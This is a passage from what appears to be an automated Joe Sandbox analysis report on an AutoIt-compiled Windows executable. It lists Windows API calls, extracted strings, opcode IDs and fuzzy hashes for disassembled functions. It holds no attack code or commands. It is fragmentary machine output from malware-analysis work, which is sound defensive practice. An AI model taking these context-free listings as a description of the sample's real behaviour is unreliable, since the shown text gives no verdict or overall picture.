                                                • _wcscat.LIBCMT ref: 007DDDFA
                                                • _wcscat.LIBCMT ref: 007DDE0C
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007DDE21
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DDE35
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DDE67
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DDE88
                                                • _wcscpy.LIBCMT ref: 007DDE94
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007DDED3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                • String ID: *.*
                                                • API String ID: 3566783562-438819550
                                                • Opcode ID: f92538308417208b8b66e3f37b2221ec41b564b1fa5e249627bfb8a108421722
                                                • Instruction ID: 5942880bc9012d139518efa66ff8b9464e71585ea8e251b3c4720a9378aae6ff
                                                • Opcode Fuzzy Hash: f92538308417208b8b66e3f37b2221ec41b564b1fa5e249627bfb8a108421722
                                                • Instruction Fuzzy Hash: 3C614B765042059FCB20EF64C8449AEB7F9FF89310F04891EF989D7251EB39E945CB92
                                                APIs
                                                • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 007D9D09
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007D9D2A
                                                • __swprintf.LIBCMT ref: 007D9D83
                                                • __swprintf.LIBCMT ref: 007D9D9C
                                                • _wprintf.LIBCMT ref: 007D9E43
                                                • _wprintf.LIBCMT ref: 007D9E61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                • API String ID: 311963372-3080491070
                                                • Opcode ID: 9e7291b5d87f0d0dbbdceea7d94c7be66357391a060d9dace27003294260969c
                                                • Instruction ID: e7056efcb0d303c3c3871e13cf8b599160f02dbd07accd27d825b189356a1205
                                                • Opcode Fuzzy Hash: 9e7291b5d87f0d0dbbdceea7d94c7be66357391a060d9dace27003294260969c
                                                • Instruction Fuzzy Hash: 76518F31900609EACF19EBE0DD8AEEEB779EF14340F208565F50962191DB782F59CBA0
                                                APIs
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • CharLowerBuffW.USER32(?,?), ref: 007DA455
                                                • GetDriveTypeW.KERNEL32 ref: 007DA4A2
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DA4EA
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DA521
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007DA54F
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 2698844021-4113822522
                                                • Opcode ID: 2174ab69b3dca975cb014d348d2c117880b8742f70d408fd8b23647275aea732
                                                • Instruction ID: 5670903211d136fde829079b11aab6fd6651d91db47a3d40b84c28c531dd51af
                                                • Opcode Fuzzy Hash: 2174ab69b3dca975cb014d348d2c117880b8742f70d408fd8b23647275aea732
                                                • Instruction Fuzzy Hash: 53514C71104304DFCB04EF20D99596AB7F4FF88758F10896DF89A97261DB39AE09CB52
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,007AE382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 007CFC10
                                                • LoadStringW.USER32(00000000,?,007AE382,00000001), ref: 007CFC19
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • GetModuleHandleW.KERNEL32(00000000,00835310,?,00000FFF,?,?,007AE382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 007CFC3B
                                                • LoadStringW.USER32(00000000,?,007AE382,00000001), ref: 007CFC3E
                                                • __swprintf.LIBCMT ref: 007CFC8E
                                                • __swprintf.LIBCMT ref: 007CFC9F
                                                • _wprintf.LIBCMT ref: 007CFD48
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007CFD5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                • API String ID: 984253442-2268648507
                                                • Opcode ID: 5c15326faa25ca9b3a5eee6e39170482360051200de98b6809beb0bcacd11ae6
                                                • Instruction ID: 0b4949db4d2881997ba9a93cb55d704b260218a21b1151b54117ca4e0daf6f52
                                                • Opcode Fuzzy Hash: 5c15326faa25ca9b3a5eee6e39170482360051200de98b6809beb0bcacd11ae6
                                                • Instruction Fuzzy Hash: 96416072904219EACF15EBD0DD9AEEE7779EF14340F104169F505B2091DE785F49CBA0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                • String ID:
                                                • API String ID: 884005220-0
                                                • Opcode ID: 6c8408844f0b08e57d9e216025a0fde2bf702848d3db4be5e57d982e8d6b7d59
                                                • Instruction ID: ef0c2d4b9934b8def0d68dbc220aec9cb7b5b2f46046c0056e5d9ce2e3c06536
                                                • Instruction Fuzzy Hash: 9761A072505211FBEB209F24D949B6E77A8FB93331F148719F8019A191EB3DD941CBA2
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 007FBA8A
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 007FBAA1
                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 007FBAAC
                                                • CloseHandle.KERNEL32(00000000), ref: 007FBAB9
                                                • GlobalLock.KERNEL32(00000000), ref: 007FBAC2
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 007FBAD1
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007FBADA
                                                • CloseHandle.KERNEL32(00000000), ref: 007FBAE1
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 007FBAF2
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00802CAC,?), ref: 007FBB0B
                                                • GlobalFree.KERNEL32(00000000), ref: 007FBB1B
                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 007FBB3F
                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 007FBB6A
                                                • DeleteObject.GDI32(00000000), ref: 007FBB92
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007FBBA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3840717409-0
                                                • Opcode ID: 989c8d36cd2ad1f14cb8488411a8505e31f212b0caf927f1aeae092c8e0b4d6d
                                                • Instruction ID: 7d09471bf97aff0298ac1a4056bd3fc6d2dd7d90234ab55c53e7ebe06ab8480f
                                                • Instruction Fuzzy Hash: ED410675600209EFDB119F65DC88EBEBBB8FF89711F108069F905D7260DB389901DB64
                                                APIs
                                                • __wsplitpath.LIBCMT ref: 007DDA9C
                                                • _wcscat.LIBCMT ref: 007DDAB4
                                                • _wcscat.LIBCMT ref: 007DDAC6
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007DDADB
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DDAEF
                                                • GetFileAttributesW.KERNEL32(?), ref: 007DDB07
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 007DDB21
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DDB33
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                • String ID: *.*
                                                • API String ID: 34673085-438819550
                                                • Opcode ID: fb2c7a66457e2ba7f4692c40ab98a734377bd79d7a3f31bc6287c5c55298bd24
                                                • Instruction ID: f47e1edde00934ffda5d76af415de514453eb8a778a0f664e7eab93f3a63b722
                                                • Instruction Fuzzy Hash: EC814E725082419FCB34EF64C88596AB7F8AB88354F19C82FF489D7351E639ED44CB52
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007FC266
                                                • GetFocus.USER32 ref: 007FC276
                                                • GetDlgCtrlID.USER32(00000000), ref: 007FC281
                                                • _memset.LIBCMT ref: 007FC3AC
                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007FC3D7
                                                • GetMenuItemCount.USER32(?), ref: 007FC3F7
                                                • GetMenuItemID.USER32(?,00000000), ref: 007FC40A
                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007FC43E
                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007FC486
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007FC4BE
                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007FC4F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                • String ID: 0
                                                • API String ID: 1296962147-4108050209
                                                • Opcode ID: 89e02e62f403ba5fbf0a129f715c16ff386f0ce1b20dfaf284f937662baa509b
                                                • Instruction ID: 07a1aa0267a4e24fecaaae8cd38fb739fe20e3541191325796ec49ce6e203b33
                                                • Instruction Fuzzy Hash: F9817B71208349AFDB11CF14D994A7ABBE8FF88354F00492DFA9597391CB38D805CBA2
                                                APIs
                                                • GetDC.USER32(00000000), ref: 007E74A4
                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007E74B0
                                                • CreateCompatibleDC.GDI32(?), ref: 007E74BC
                                                • SelectObject.GDI32(00000000,?), ref: 007E74C9
                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007E751D
                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007E7559
                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007E757D
                                                • SelectObject.GDI32(00000006,?), ref: 007E7585
                                                • DeleteObject.GDI32(?), ref: 007E758E
                                                • DeleteDC.GDI32(00000006), ref: 007E7595
                                                • ReleaseDC.USER32(00000000,?), ref: 007E75A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                • String ID: (
                                                • API String ID: 2598888154-3887548279
                                                • Opcode ID: 9306f51f06893dba2b556f2e9c0c43160908c7132128ad75454b85a051afa16e
                                                • Instruction ID: fc860b01ec9795098c725f838b28fb77813bfdf0f98b19ecc69410816204d39a
                                                • Instruction Fuzzy Hash: 74515A71904249EFCB25CFA9CC85EAEBBB9EF48310F14C42DF95997250DB35A940CB64
                                                APIs
                                                  • Part of subcall function 00790AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00776C6C,?,00008000), ref: 00790AF3
                                                  • Part of subcall function 007748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007748A1,?,?,007737C0,?), ref: 007748CE
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00776D0D
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00776E5A
                                                  • Part of subcall function 007759CD: _wcscpy.LIBCMT ref: 00775A05
                                                  • Part of subcall function 007937BD: _iswctype.LIBCMT ref: 007937C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                • API String ID: 537147316-1018226102
                                                • Opcode ID: e499e15b86de6fe607befdb94ca7edc30435e45f16642e88f028dbad5ee57345
                                                • Instruction ID: d6f9fd66e2a428e0dcc4596a4da39951788ac68c5cb7d3310c15000eae1aadd9
                                                • Instruction Fuzzy Hash: 51027C31108341DFCB24EF24C885AAFBBE5BF99354F04892DF48997261DB78E949CB52
                                                APIs
                                                • _memset.LIBCMT ref: 007745F9
                                                • GetMenuItemCount.USER32(00835890), ref: 007AD6FD
                                                • GetMenuItemCount.USER32(00835890), ref: 007AD7AD
                                                • GetCursorPos.USER32(?), ref: 007AD7F1
                                                • SetForegroundWindow.USER32(00000000), ref: 007AD7FA
                                                • TrackPopupMenuEx.USER32(00835890,00000000,?,00000000,00000000,00000000), ref: 007AD80D
                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007AD819
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                • String ID:
                                                • API String ID: 2751501086-0
                                                • Opcode ID: 9c5e603547ee40ed5e7a5c307a354bc12213c281e5c6d721bdfa4b1b8cb2ee39
                                                • Instruction ID: a5ad379f3fa9c2a3afbcf0a3edf9aee989803ba0c8d6c0a2b06127eafd90b7d3
                                                • Instruction Fuzzy Hash: 27711A70640205BFEB309F14DC49FAABF64FF463A4F104216F51AA61E1CBB95C20CB55
                                                APIs
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                • _memset.LIBCMT ref: 007C7B93
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007C7BC8
                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007C7BE4
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007C7C00
                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007C7C2A
                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 007C7C52
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C7C5D
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007C7C62
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                • API String ID: 1411258926-22481851
                                                • Opcode ID: 881d2cbc3f77d6d69f7fc37386e6e811f45491e6df5b0cf59f2e2bff00647879
                                                • Instruction ID: 3335eb306bdf644b5009c48b0b53d26e120e74a3450509bdc66e8f51f5caa4cd
                                                • Instruction Fuzzy Hash: 31410972C14229ABCF25EBA4DC85DEDB778FF08750F048169E815A7261EF785E05CB90
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EFE38,?,?), ref: 007F0EBC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                • API String ID: 3964851224-909552448
                                                • Opcode ID: a16c0e73997117acb5d84ae81a6cd28098328d1c22731739674bf86437a251c1
                                                • Instruction ID: 7d0ed09cb1e3d2e079f467e6bc259492ec947ce33ec7d507e9f886a8e5d7adf9
                                                • Instruction Fuzzy Hash: B041683011064ECFCF20EF50E894AEA3760FF12340F544425FE955B382EB39999ADBA0
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007AE5F9,00000010,?,Bad directive syntax error,007FF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 007CFAF3
                                                • LoadStringW.USER32(00000000,?,007AE5F9,00000010), ref: 007CFAFA
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • _wprintf.LIBCMT ref: 007CFB2D
                                                • __swprintf.LIBCMT ref: 007CFB4F
                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007CFBBE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                • API String ID: 1506413516-4153970271
                                                • Opcode ID: 55032d871663ddc8ee94cda02fa002dcba49f28c33731eece4cd60787f6af1ce
                                                • Instruction ID: 674cc5352fc60e79609fe3ca2720cb589f5d72f1a04b6d9ff11961fa0937e7f8
                                                • Instruction Fuzzy Hash: 3B216F7180021AEBCF16EFA0DC5AEEE7735FF14300F048469F515621A1DA799A58DB50
                                                APIs
                                                  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
                                                  • Part of subcall function 00777A84: _memmove.LIBCMT ref: 00777B0D
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007D53D7
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007D53ED
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007D53FE
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007D5410
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007D5421
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: SendString$_memmove
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                • API String ID: 2279737902-1007645807
                                                • Opcode ID: 098b96e472c678a453b1e8d12b53611327c96756f953e41385acd3f2ee564968
                                                • Instruction ID: 2f772db45d8de95a46c11ac025e8edfe64c034dd61f4e134cc49d629121fb8f6
                                                • Opcode Fuzzy Hash: 098b96e472c678a453b1e8d12b53611327c96756f953e41385acd3f2ee564968
                                                • Instruction Fuzzy Hash: E7119020A51179BADB24A661DC4ADFF7BBCFB91B80F00842AB415A21D1DEA81D84C5A1
                                                APIs
